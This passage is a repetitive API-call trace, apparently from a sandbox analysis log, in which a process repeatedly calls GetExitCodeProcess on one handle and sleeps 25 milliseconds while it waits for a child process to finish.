lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0301.241] Sleep (dwMilliseconds=0x19) [0301.299] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0301.299] Sleep (dwMilliseconds=0x19) [0301.349] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0301.349] Sleep (dwMilliseconds=0x19) [0301.384] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0301.384] Sleep (dwMilliseconds=0x19) [0301.428] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0301.429] Sleep (dwMilliseconds=0x19) [0301.490] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0301.490] Sleep (dwMilliseconds=0x19) [0301.520] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0301.520] Sleep (dwMilliseconds=0x19) [0301.597] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0301.597] Sleep (dwMilliseconds=0x19) [0301.651] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0301.651] Sleep (dwMilliseconds=0x19) [0301.686] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0301.686] Sleep (dwMilliseconds=0x19) [0301.759] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0301.759] Sleep (dwMilliseconds=0x19) [0301.825] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0301.825] Sleep (dwMilliseconds=0x19) [0301.873] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0301.874] Sleep (dwMilliseconds=0x19) [0301.907] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0301.908] Sleep (dwMilliseconds=0x19) [0301.941] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0301.941] Sleep (dwMilliseconds=0x19) [0301.977] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0301.977] Sleep (dwMilliseconds=0x19) [0302.041] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0302.041] Sleep (dwMilliseconds=0x19) [0302.079] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0302.079] Sleep (dwMilliseconds=0x19) [0302.159] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0302.159] Sleep (dwMilliseconds=0x19) [0302.199] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0302.200] Sleep (dwMilliseconds=0x19) [0302.226] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0302.227] Sleep (dwMilliseconds=0x19) [0302.253] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0302.253] Sleep (dwMilliseconds=0x19) [0302.306] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0302.306] Sleep (dwMilliseconds=0x19) [0302.359] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0302.360] Sleep (dwMilliseconds=0x19) [0302.475] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0302.475] Sleep (dwMilliseconds=0x19) [0302.532] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0302.532] Sleep (dwMilliseconds=0x19) [0302.567] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0302.567] Sleep (dwMilliseconds=0x19) [0302.612] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0302.612] Sleep (dwMilliseconds=0x19) [0302.639] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0302.639] Sleep (dwMilliseconds=0x19) [0302.671] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0302.671] Sleep (dwMilliseconds=0x19) [0302.703] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0302.703] Sleep (dwMilliseconds=0x19) [0302.742] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0302.742] Sleep (dwMilliseconds=0x19) [0302.779] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0302.779] Sleep (dwMilliseconds=0x19) [0302.828] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0302.828] Sleep (dwMilliseconds=0x19) [0302.946] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0302.946] Sleep (dwMilliseconds=0x19) [0303.082] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0303.082] Sleep (dwMilliseconds=0x19) [0303.261] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0303.261] Sleep (dwMilliseconds=0x19) [0303.329] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0303.330] Sleep (dwMilliseconds=0x19) [0303.359] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0303.360] Sleep (dwMilliseconds=0x19) [0303.477] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0303.477] Sleep (dwMilliseconds=0x19) [0303.505] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0303.505] Sleep (dwMilliseconds=0x19) [0303.532] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0303.532] Sleep (dwMilliseconds=0x19) [0303.613] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0303.614] Sleep (dwMilliseconds=0x19) [0303.658] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0303.658] Sleep (dwMilliseconds=0x19) [0303.690] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0303.690] Sleep (dwMilliseconds=0x19) [0303.716] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0303.716] Sleep (dwMilliseconds=0x19) [0303.747] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0303.747] Sleep (dwMilliseconds=0x19) [0303.777] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0303.777] Sleep (dwMilliseconds=0x19) [0303.809] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0303.809] Sleep (dwMilliseconds=0x19) [0303.839] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0303.839] Sleep (dwMilliseconds=0x19) [0303.879] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0303.879] Sleep (dwMilliseconds=0x19) [0303.920] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0303.920] Sleep (dwMilliseconds=0x19) [0303.946] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0303.946] Sleep (dwMilliseconds=0x19) [0303.986] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0303.986] Sleep (dwMilliseconds=0x19) [0304.020] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0304.020] Sleep (dwMilliseconds=0x19) [0304.047] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0304.047] Sleep (dwMilliseconds=0x19) [0304.088] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0304.088] Sleep (dwMilliseconds=0x19) [0304.202] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0304.203] Sleep (dwMilliseconds=0x19) [0304.234] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0304.234] Sleep (dwMilliseconds=0x19) [0304.264] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0304.264] Sleep (dwMilliseconds=0x19) [0304.302] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0304.302] Sleep (dwMilliseconds=0x19) [0304.358] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0304.358] Sleep (dwMilliseconds=0x19) [0304.399] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0304.399] Sleep (dwMilliseconds=0x19) [0304.430] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0304.430] Sleep (dwMilliseconds=0x19) [0304.456] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0304.456] Sleep (dwMilliseconds=0x19) [0304.509] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0304.509] Sleep (dwMilliseconds=0x19) [0304.537] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0304.537] Sleep (dwMilliseconds=0x19) [0304.567] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0304.567] Sleep (dwMilliseconds=0x19) [0304.599] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0304.600] Sleep (dwMilliseconds=0x19) [0304.626] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0304.626] Sleep (dwMilliseconds=0x19) [0304.665] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0304.665] Sleep (dwMilliseconds=0x19) [0304.693] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0304.693] Sleep (dwMilliseconds=0x19) [0304.729] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0304.729] Sleep (dwMilliseconds=0x19) [0304.759] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0304.759] Sleep (dwMilliseconds=0x19) [0304.791] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0304.791] Sleep (dwMilliseconds=0x19) [0304.820] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0304.821] Sleep (dwMilliseconds=0x19) [0304.851] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0304.851] Sleep (dwMilliseconds=0x19) [0304.883] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0304.883] Sleep (dwMilliseconds=0x19) [0304.909] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0304.909] Sleep (dwMilliseconds=0x19) [0304.940] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0304.940] Sleep (dwMilliseconds=0x19) [0304.968] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0304.968] Sleep (dwMilliseconds=0x19) [0304.998] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0304.998] Sleep (dwMilliseconds=0x19) [0305.029] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0305.029] Sleep (dwMilliseconds=0x19) [0305.057] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0305.057] Sleep (dwMilliseconds=0x19) [0305.083] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0305.083] Sleep (dwMilliseconds=0x19) [0305.155] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0305.155] Sleep (dwMilliseconds=0x19) [0305.184] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0305.184] Sleep (dwMilliseconds=0x19) [0305.214] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0305.214] Sleep (dwMilliseconds=0x19) [0305.240] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0305.241] Sleep (dwMilliseconds=0x19) [0305.267] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0305.267] Sleep (dwMilliseconds=0x19) [0305.294] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0305.294] Sleep (dwMilliseconds=0x19) [0305.331] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0305.331] Sleep (dwMilliseconds=0x19) [0305.357] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0305.357] Sleep (dwMilliseconds=0x19) [0305.383] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0305.383] Sleep (dwMilliseconds=0x19) [0305.416] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0305.416] Sleep (dwMilliseconds=0x19) [0305.443] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0305.443] Sleep (dwMilliseconds=0x19) [0305.475] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0305.475] Sleep (dwMilliseconds=0x19) [0305.502] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0305.502] Sleep (dwMilliseconds=0x19) [0305.529] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0305.529] Sleep (dwMilliseconds=0x19) [0305.563] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0305.563] Sleep (dwMilliseconds=0x19) [0305.593] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0305.593] Sleep (dwMilliseconds=0x19) [0305.627] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0305.627] Sleep (dwMilliseconds=0x19) [0305.659] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0305.659] Sleep (dwMilliseconds=0x19) [0305.685] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0305.685] Sleep (dwMilliseconds=0x19) [0305.722] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0305.722] Sleep (dwMilliseconds=0x19) [0305.756] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0305.756] Sleep (dwMilliseconds=0x19) [0305.782] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0305.782] Sleep (dwMilliseconds=0x19) [0305.825] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0305.825] Sleep (dwMilliseconds=0x19) [0305.871] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0305.871] Sleep (dwMilliseconds=0x19) [0305.900] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0305.900] Sleep (dwMilliseconds=0x19) [0305.930] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0305.930] Sleep (dwMilliseconds=0x19) [0305.989] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0305.989] Sleep (dwMilliseconds=0x19) [0306.023] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0306.023] Sleep (dwMilliseconds=0x19) [0306.051] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0306.051] Sleep (dwMilliseconds=0x19) [0306.082] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0306.082] Sleep (dwMilliseconds=0x19) [0306.146] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0306.146] Sleep (dwMilliseconds=0x19) [0306.177] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0306.177] Sleep (dwMilliseconds=0x19) [0306.205] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0306.205] Sleep (dwMilliseconds=0x19) [0306.231] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0306.231] Sleep (dwMilliseconds=0x19) [0306.263] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0306.264] Sleep (dwMilliseconds=0x19) [0306.290] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0306.290] Sleep (dwMilliseconds=0x19) [0306.319] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0306.321] Sleep (dwMilliseconds=0x19) [0306.352] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0306.353] Sleep (dwMilliseconds=0x19) [0306.379] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0306.379] Sleep (dwMilliseconds=0x19) [0306.406] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0306.406] Sleep (dwMilliseconds=0x19) [0306.432] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0306.432] Sleep (dwMilliseconds=0x19) [0306.458] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0306.458] Sleep (dwMilliseconds=0x19) [0306.489] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0306.489] Sleep (dwMilliseconds=0x19) [0306.515] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0306.515] Sleep (dwMilliseconds=0x19) [0306.559] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0306.559] Sleep (dwMilliseconds=0x19) [0306.594] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0306.594] Sleep (dwMilliseconds=0x19) [0306.622] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0306.622] Sleep (dwMilliseconds=0x19) [0306.649] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0306.649] Sleep (dwMilliseconds=0x19) [0306.692] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0306.692] Sleep (dwMilliseconds=0x19) [0306.906] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0306.906] Sleep (dwMilliseconds=0x19) [0306.944] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0306.944] Sleep (dwMilliseconds=0x19) [0307.012] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0307.012] Sleep (dwMilliseconds=0x19) [0307.079] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0307.079] Sleep (dwMilliseconds=0x19) [0307.114] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0307.114] Sleep (dwMilliseconds=0x19) [0307.187] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0307.187] Sleep (dwMilliseconds=0x19) [0307.228] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0307.228] Sleep (dwMilliseconds=0x19) [0307.335] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0307.335] Sleep (dwMilliseconds=0x19) [0307.361] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0307.361] Sleep (dwMilliseconds=0x19) [0307.388] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0307.388] Sleep (dwMilliseconds=0x19) [0307.434] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0307.434] Sleep (dwMilliseconds=0x19) [0307.465] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0307.465] Sleep (dwMilliseconds=0x19) [0307.492] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0307.492] Sleep (dwMilliseconds=0x19) [0307.532] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0307.532] Sleep (dwMilliseconds=0x19) [0307.628] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0307.628] Sleep (dwMilliseconds=0x19) [0307.684] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0307.684] Sleep (dwMilliseconds=0x19) [0307.722] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0307.722] Sleep (dwMilliseconds=0x19) [0307.764] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0307.765] Sleep (dwMilliseconds=0x19) [0307.814] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0307.814] Sleep (dwMilliseconds=0x19) [0307.849] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0307.849] Sleep (dwMilliseconds=0x19) [0307.898] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0307.898] Sleep (dwMilliseconds=0x19) [0307.939] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0307.939] Sleep (dwMilliseconds=0x19) [0307.965] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0307.965] Sleep (dwMilliseconds=0x19) [0307.997] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0307.997] Sleep (dwMilliseconds=0x19) [0308.049] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0308.049] Sleep (dwMilliseconds=0x19) [0308.147] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0308.147] Sleep 